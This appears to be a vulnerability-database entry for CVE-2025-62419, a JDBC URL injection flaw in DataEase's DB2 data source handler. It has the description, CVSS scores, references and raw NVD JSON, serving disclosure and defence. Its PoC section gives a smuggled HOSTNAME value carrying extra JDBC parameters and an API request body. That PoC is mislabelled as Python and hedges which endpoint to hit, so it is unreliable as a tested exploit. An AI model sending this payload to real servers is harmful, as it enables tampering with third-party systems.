CVE-2025-62419

Description

DataEase is a data visualization and analytics platform. In DataEase versions through 2.10.13, a JDBC URL injection vulnerability exists in the DB2 and MongoDB data source configuration handlers. In the DB2 data source handler, when the extraParams field is empty, the HOSTNAME, PORT, and DATABASE values are directly concatenated into the JDBC URL without filtering illegal parameters. This allows an attacker to inject a malicious JDBC string into the HOSTNAME field to bypass previously patched vulnerabilities CVE-2025-57773 and CVE-2025-58045. The vulnerability is fixed in version 2.10.14. No known workarounds exist.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* - VULNERABLE

DataEase <= 2.10.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-62419 - DataEase JDBC URL Injection PoC
// Vulnerability: JDBC URL injection via HOSTNAME field in DB2 data source configuration
// Affected: DataEase <= 2.10.13

// The vulnerability exists in DB2 data source handler where HOSTNAME is directly
// concatenated into JDBC URL without filtering illegal parameters.

// Normal JDBC URL format:
// jdbc:db2://{HOSTNAME}:{PORT}/{DATABASE}

// Malicious HOSTNAME payload example:
const maliciousHostname = "127.0.0.1:50000/test;securityMechanism=9;user=admin;password=admin;";

// When extraParams is empty, the system constructs JDBC URL as:
// jdbc:db2://127.0.0.1:50000/test;securityMechanism=9;user=admin;password=admin;:50000/test
// This allows injection of arbitrary JDBC parameters.

// Exploit via API request to add/modify DB2 data source:
const exploitPayload = {
    "name": "malicious_db2_source",
    "type": "db2",
    "hostName": "127.0.0.1:50000/test;securityMechanism=9;user=admin;password=admin;",
    "port": 50000,
    "database": "test",
    "username": "attacker",
    "password": "attacker",
    "extraParams": ""  // Empty to trigger vulnerable code path
};

// HTTP POST request to DataEase data source configuration API:
// POST /api/data-source/add or /api/data-source/update
// Content-Type: application/json
// Body: { exploitPayload }

// The injected parameters will be parsed by the JDBC driver,
// potentially overriding security settings or redirecting connections.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62419
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62419
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62419/
[4] VulDB https://vuldb.com/cve/CVE-2025-62419
[5] https://github.com/dataease/dataease/commit/bb320e42bf2cf862b9c4b438c1517547b53ed67b
[6] https://github.com/dataease/dataease/security/advisories/GHSA-x4x9-mjcf-99r9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62419", "sourceIdentifier": "[email protected]", "published": "2025-10-17T18:15:37.310", "lastModified": "2025-10-24T16:56:36.127", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DataEase is a data visualization and analytics platform. In DataEase versions through 2.10.13, a JDBC URL injection vulnerability exists in the DB2 and MongoDB data source configuration handlers. In the DB2 data source handler, when the extraParams field is empty, the HOSTNAME, PORT, and DATABASE values are directly concatenated into the JDBC URL without filtering illegal parameters. This allows an attacker to inject a malicious JDBC string into the HOSTNAME field to bypass previously patched vulnerabilities CVE-2025-57773 and CVE-2025-58045. The vulnerability is fixed in version 2.10.14. No known workarounds exist."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.10.14", "matchCriteriaId": "A61426A2-1A80-4988-BB10-6ACCC38166C6"}]}]}], "references": [{"url": "https://github.com/dataease/dataease/commit/bb320e42bf2cf862b9c4b438c1517547b53ed67b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/dataease/dataease/security/advisories/GHSA-x4x9-mjcf-99r9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}